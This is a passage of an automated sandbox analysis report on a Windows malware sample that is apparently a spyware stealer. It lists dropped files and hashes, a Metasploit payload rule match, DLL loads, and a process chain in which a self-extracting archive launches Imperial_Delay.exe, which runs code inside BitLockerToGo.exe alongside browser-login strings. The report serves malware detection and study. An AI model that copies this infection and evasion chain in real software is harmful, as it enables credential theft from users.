              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00442AB02_2_00442AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BABB2_2_0042BABB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041DB482_2_0041DB48
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00424B502_2_00424B50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00420B702_2_00420B70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042FB392_2_0042FB39
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446BB02_2_00446BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041EC802_2_0041EC80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043CC902_2_0043CC90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00445D402_2_00445D40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00425D7B2_2_00425D7B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00429E482_2_00429E48
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00422E702_2_00422E70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AE182_2_0042AE18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AEE02_2_0042AEE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00423E902_2_00423E90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042DF772_2_0042DF77
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00420FE92_2_00420FE9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446F802_2_00446F80
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dll 86F6A04FE611CA402D3C4841561F5B396CE61F0212BB6DA58C7274532E2CFD14
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dll EAA9EFDE1704FA6ABBEF9878EECFA386E89003F23E07ADCAF641A6C741893BA1
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dll 84B47308ABC293515FA8B682D7EDE3A53FED426A7073CFEC466BCDE681DA715F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040D040 appears 68 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0041E8C0 appears 234 times
              Source: libidn2-0.dll.0.drStatic PE information: Number of sections : 11 > 10
              Source: libintl-8.dll.0.drStatic PE information: Number of sections : 12 > 10
              Source: libiconv-2.dll.0.drStatic PE information: Number of sections : 12 > 10
              Source: 00000001.00000002.1881484672.000000000A7D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/13@10/2
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECD3BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF70ECD3BF8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043D8D0 CoCreateInstance,2_2_0043D8D0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECEC260 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF70ECEC260
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
              Source: HLZwUhcJ28.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: qsqlite.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: qsqlite.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: qsqlite.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: qsqlite.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: qsqlite.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: qsqlite.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: BitLockerToGo.exe, 00000002.00000003.1924561686.0000000005066000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1925169464.000000000504A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: qsqlite.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: HLZwUhcJ28.exeReversingLabs: Detection: 50%
              Source: Imperial_Delay.exeString found in binary or memory: &github.com/filecoin-project/go-address
              Source: Imperial_Delay.exeString found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine (BADINDEX)%!(NOVERB)Connectionlocal-addrSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookieuser-agentkeep-aliveconnectionHost: %s
              Source: Imperial_Delay.exeString found in binary or memory: stopm spinning nmidlelocked= needspinning=store64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine RegSetValueExWContent-Length; SameSite=LaxERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofinternal errorunknown error unknown code: Not AcceptableMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM.WithDeadline(<not Stringer>.in-addr.arpa.unknown mode: invalid syntax1907348632812595367431640625unexpected EOFunsafe.Pointer on zero Valuereflect.Value.unknown method^[a-f0-9]{64}$^[a-f0-9]{96}$CLICOLOR_FORCEerrdefs.Vertexerrdefs.Sourceexec.meta.baseexec.mount.sshexec.secretenvpb.ExportCachereserved_rangefield_presencemurmur3-x64-64ControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDOpenSCManagerWSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWModule32FirstWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunreachable: /log/filter.go/log/helper.goboringcrypto: data truncated
              Source: Imperial_Delay.exeString found in binary or memory: depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE=
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.init.0
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.glob..func1
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.glob..func2
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.String
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Empty
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Unmarshal
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Marshal
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Scan
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.addressHash
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.newAddress
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.encode
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Checksum
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.base32decode
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.decode
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.hash
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalCBOR
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalCBOR
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.init.1
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.init
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Empty
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Marshal
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Payload
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Protocol
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Unmarshal
              Source: Imperial_Delay.exeString found in binary or memory: net/addrselect.go
              Source: Imperial_Delay.exeString found in binary or memory: google.golang.org/grpc@v1.64.0/internal/balancerload/load.go
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
              Source: Imperial_Delay.exeString found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
              Source: Imperial_Delay.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile read: C:\Users\user\Desktop\HLZwUhcJ28.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\HLZwUhcJ28.exe "C:\Users\user\Desktop\HLZwUhcJ28.exe"
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: HLZwUhcJ28.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: HLZwUhcJ28.exeStatic file information: File size 13706949 > 1048576
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: HLZwUhcJ28.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: HLZwUhcJ28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb source: VBoxClient-x86.dll.0.dr
              Source: Binary string: BitLockerToGo.pdb source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5GuiVBox.pdb source: Qt5GuiVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb<<9 source: VBoxClient-x86.dll.0.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: HLZwUhcJ28.exe
              Source: Binary string: R:\tinderbox\win-qt-5.15\out\qtbase\plugins\sqldrivers\qsqlite.pdb source: qsqlite.dll.0.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub-x86\VBoxProxyStub-x86.pdb source: VBoxProxyStub-x86.dll.0.dr
              Source: HLZwUhcJ28.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: HLZwUhcJ28.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: HLZwUhcJ28.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: HLZwUhcJ28.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: HLZwUhcJ28.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6902359Jump to behavior
              Source: HLZwUhcJ28.exeStatic PE information: section name: .didat
              Source: HLZwUhcJ28.exeStatic PE information: section name: _RDATA
              Source: VBoxProxyStub-x86.dll.0.drStatic PE information: section name: .orpc
              Source: Imperial_Delay.exe.0.drStatic PE information: section name: .symtab
              Source: libiconv-2.dll.0.drStatic PE information: section name: .xdata
              Source: libidn2-0.dll.0.drStatic PE information: section name: .xdata
              Source: libintl-8.dll.0.drStatic PE information: section name: .xdata
              Source: qsqlite.dll.0.drStatic PE information: section name: .qtmetad
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0044CE5D push esp; retf 2_2_0044CE67
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\qsqlite.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxProxyStub-x86.dllJump to dropped file
